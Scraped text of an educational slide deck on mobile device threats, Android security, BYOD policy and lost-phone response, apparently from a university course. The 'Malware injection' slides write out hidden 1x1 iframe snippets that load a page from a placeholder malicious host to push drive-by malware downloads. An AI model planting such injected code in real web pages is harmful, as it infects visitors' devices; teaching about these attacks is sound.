Follow
Publications: 61 | Followers: 0

Mobile Threats and Attacks - The University of Tennessee ...

Publish on Category: Birds 0

Mobile Threats and Attacks
Possible attack threats to mobile devices
Network exploitHackers takes advantage of vulnerability or flaw of user’s web browser on mobile device inWiFicommunication to attack victims.Hackers send malicious code/data from malicious logic websites to victim’s browser after user browses the malicious page and the malicious code will take over the control to get all sensitive data on the victim’s device.Social engineeringHackers use hyped contents to attract, manipulate, or persuade people into revealing confidential information through deception such as phishing for the purpose of information gathering, fraud, or access rights.
Possible attack threats to mobile devices
MalwareVirushosted on a legitimate code, replicable spread worms, Trojan horses with action in purposeMisuse available resource and serviceEmail/SMSspam or denial of service (A group of the attacking devices send volume data to one targets on the Internet to impact the target’s services)
Possible attack threats to mobile devices
Enterprise/private Data LossWorkplace data on a mobile device may be uploaded to home PC while synchronizing of entertainment downloading or Enterprise/private data loss due to stolen deviceDatatamperIntentionallymodify/corrupt device data without the permission such as device’s contact list
Best practices protectingmobile device from potential threats
Protect data loss due to mobile device loss withdeviceID and remotely remove all theapps, contacts, and confidential data right after themobile phoneis stolen or lostTypeURL instead of copying/pasting or clicking linkstoprotect mobile phones from drive-by downloadattacksProtectdata privacy by data Encryption, don’tcache sensitivedataDisable unnecessary device features such asWi-Fi, Bluetooth, and infrared when they aren’t in use.Enablingthe firewall, disable sharing
Best practices protecting mobile device from potential threats
Isolate personal apps and corporate appsDetect and Remove malware AppsDownload all mobile apps from trusted sources application providers and check the permission requests during installationInstall a mobile security application to protect the mobile device from attacks
Mobile device security protection Strategies
Block the app’s attempt to act beyond grantedpermissionsAccess Control with ID and resource access permission requirementAppsignature: Eachapp is signed with the identity of its author and protect app fromtamperingEncryption: Encryptdata for data protection in case of device loss ortheftIsolation: Restrictany app to access the sensitive data on a device. Each Android app runs in its own virtual machine (process) which does not allow any access to resource belong to other VM except special permission grant.
Android’s Security
Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices.The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple.A hacker can create and distribute malicious app since people will not be able to track down to the source and attackers add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost.
Bring Your Own Device (BYOD) with Mobile Device Management (MDM)
Enterprise BYOD policy:Use MDM tools to oversee and control mobile devices in secure operationsStore enterprise data in sandboxEncrypte enterprise data on mobile devicesKeep apps current with less vulnerabilities and flawsRoutinely back up all apps and upgrade OSAuthenticate and register all mobile devices with Secure Socket Layer (SSL) certificateAdopt app blacklisting within enterpriseManagement on the lost and stolen devicesSeparate personal and business accountsControls user access
Mobile Malware Security Solutions
Popular Mobile Malware(malicious software) are:Spyware – steals user information with user’s consentsomehow.Trojan horse – steals confidential information such as credit cardAdware - displays unwanted pop-up ads with/without theft ofsensitivedataThereare some malware that just degrade or disrupt device operations such as rebooting device and exhausting device power without financial profit purpose.Dueto small screen size of mobile device most apps don’t show the URL address on the device screen while accessing web which takes even more difficult for mobile device user monitor and determine the destination of app on web.
Common types of malware delivery mechanisms
Drive-by malware(silent Malware)Drive-bymalware delivers(downloads) itself onto a user’s devices without their consent and interaction by exploiting vulnerabilities of user browser via an invisible element such as HTMLiframetag element or by HTML embed element of image file. Such malware either tempts the victim to visit a infected website or send malware-infected messages (SMS).SoftwareupdatesMalwareinvites users to update software ( turned out to be a malicious one) on social network or web sits.
Common types of malware delivery mechanisms
Pop-up adsAdware lures users to click on an ad that directs user to download/install malicious code such as Trojan horse in a word or pdf file. The downloaded may also be The keylogger which monitors mouse operations or keyboard strokes to steal personal data.Man-in-the-middle(MITM)Hacker may hijack a session byeavesdroppingwhere the hacker makes independent connections with the victims and relays messages between two parties such that both parties thought they are talking directly to each other over. The MITM hacker intercepts all conversation and injectBotnetOne attacker controls a group of sites(devices) to send a large volume of traffic to a victim resulted in a denial of service (DoS) attack. Afterwards, the hacker Demands the victim a payment to stop the attack.
Malware detection and protection solution
Filtering with blacklisting and whitelistingMany search engines place malicious website a blocked list “blacklist.” The search engine will warn to potential visitor who intends access such sites on the list. A enterprise or a personal can also setup their own blacklist. A whitelist filter onlyonlyaccess to these on the list if a whitelist is exclusive. The filter techniques are widely used for spam email filtering.View page source codeUse Page Source (Firefox) or Source (IE) to view the actual source code to find out the injected malicious code
Spyware detection techniques
StaticanalysisStatic analysis is a reverse engineering analysis approach to finding malicious characteristics code segments in an app without execution. The analysis focus on these obvious security threats which have been reported before. One lab in this module is given on the static analysis approach to detect spyware.b. DynamicanalysisDynamic analysis will execute the suspicious mobile app in an isolated sandbox, such as a virtual machine or emulator to monitor and inspect the app’s dynamic behavior.c. AppPermission analysisAndroid security uses permission to protect and detect by permissions in an Android mobile app’s intentions. The permissions are required to be clearly specified by app’s authors. Many spyware attacks make use of  app’s vulnerability on the permission.
Malwareinjection
Malware injection is the act of inserting malicious code into a vulnerable web server page with poor application input filtering such that their devices get infected with malware when users interact with such page via form or other GUI components. This injection can be detected by a filter deployed on web server to filter out invalid commands such as SQL injection commands. Malware injection works as:
Malware injection
1. Inject a vulnerable website with malicious code that web browsers may requestHTML:<iframesrc=”http://www.malwebsite/malpage.html”width=”1″ height=”1″ style=”visibility: hidden”></iframe>JavaScript(iframeis generated dynamically):<divstyle-“visibility:hidden:position:absolute: 1; top: 1”><iframesrc=”http://www.malwebsite.com/malpage.html”width=”1″ height=”1″ style=”visibility: hidden”></iframe></div>
2. Exploit and take over control the infected web browsers with this injected code, direct the exploited web browser to download malware to users' devicesOnce user browses the injected web page, the malicious content from Hop Point (a website controlled by the hacker) to execute inside the requested (and presumed legitimate) web page. The malware injection process instructed in “http://www.malwebsite.com/malpage.html” is loaded from here through the iframe to the browser itself which will install specific piece set of instructions for the browser to connect to a malicious site in order to download malware such as remote control utilities and backdoors as well as programs that automatically crawl the hard disk in search of information such as credit card details or bank accounts3. Finally, the victim will Silently run this downloaded malware on user device
Safeguards
Log on as a no-admin userSecure your browserSet browser security to high to reject unwanted javascripts.Use Firefox with "no-script" to only run scripts from sites onwhitelistexamine the application code and web server for evidence of:Injected Iframes, javascript, SQL Injection, objects such as flash, PDF
Mobile device loss/Theft
Now, smart mobile device is not only for just calling or sending a message, it has become business and playing tool for us.We’ve stored amount of personal data and even more sensitive important company data in the mobile device. These data may be exposed:  Email exchanges could be seen;  m-commence data such as online purchasing or banking transaction might be viewed;  If the phone is connected via a VPN, company networks will be exposed to malware or could be hacked.Americans lost about $30 billion worth of mobile phones last year.  Phones may be lost anywhere and anytime.Nearly all who found the lost phones tried to access the information on the phone,
Mobile device loss/Theft
The loss of mobile device becomes a concern. About 2/3 of mobile device users feared not being able to recover lost content.It is one of major focus of security concerns for Android mobile device. Some security experts have pointed out that targeting smartphones could potentially be more profitable for criminals than aiming at computers
Action on Your Stolen Mobile Phone
Avoid data lossQuick restoration of all important data with a preinstalled auto-backup app (e.g.,WaveSecure,MyBackup)Install a mobile tracking app to protect our mobile device(Android Lost, Where’s My Droid)Salvage ActionsReportthe loss/theft to your organization and/or mobile service provider immediately to deter malicious use of your device and minimize fraudulent charges.Changeaccount credentials. If devices are used to access remote resources such as corporate networks or social networking sites, you should contact your enterprise or organization to revoke all credentials that were stored on the lost device, all issued certificates or change your password.revoke. Locking Smartphone is the first line of defense line for protection of preventing thieves from stealing broadband service such as SMS fees, reading your email, or abusing VPN connections.
locates, locks and wipes.
Locates: Locate your lost device and display the location on a Google map. Register your Android device with one of the many available "find me" services to locate and recover lost devicesLocks:Remotely locks down your lost device, that nobody can use your phone without your access, even somebody else exchanges the SIM card on your phone.Use lock apps such as Norton Mobile or AppProtector or PIN/ passwords to lock your android devices. You can also enroll in a remote find/lock service.  Enterprises can ensuring company devices using either Exchange ActiveSync or the Android 2.2 Device Admin to remotely enforce password policies and routinely lock these devices and reset passwords.Wipes:Remotely wipe out important data which stored on your device.Some mobile service providers offer remote default and selective wiping, which allows you or your provider to remotely delete all data on the phone.
Android’s Security
Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices.The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple.A hacker can create and distribute ma­licious app since people will not be able to track down to the source and add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost.
Mobile Device-Encryption
Android 2.2 does not support the encryption. There is no app can do full device encryption without Android OS support .Google has designed Android 3.0 for mobile device and they have taken some steps for users and the enterprise. Android 3.0 comes loaded with full encryption support for data stored on the device.We can still use some file encryption tools to protect our selected file and data.
References
A window into Mobile device securityhttp://www.symantec.com/content/en/us/about/media/pdfs/symc_mobile_device_security_june2011.pdfhttp://www.continuitycentral.com/feature0919.htmlhttp://www.usatoday.com/tech/news/story/2012-03-22/lost-phones/53707448/1]US-CERT Resource: Paul Ruggiero and Jon Foote, “Cyber Threats to Mobile Phones”, http://www.us-cert.gov/reading_room/cyber_threats_to_mobile_phones.pdf)Top 10 android Security Riskshttp://www.esecurityplanet.com/views/article.php/3928646/Top-10-Android-Security-Risks.htm

0

Embed

Share

Upload

Make amazing presentation for free
Mobile Threats and Attacks - The University of Tennessee ...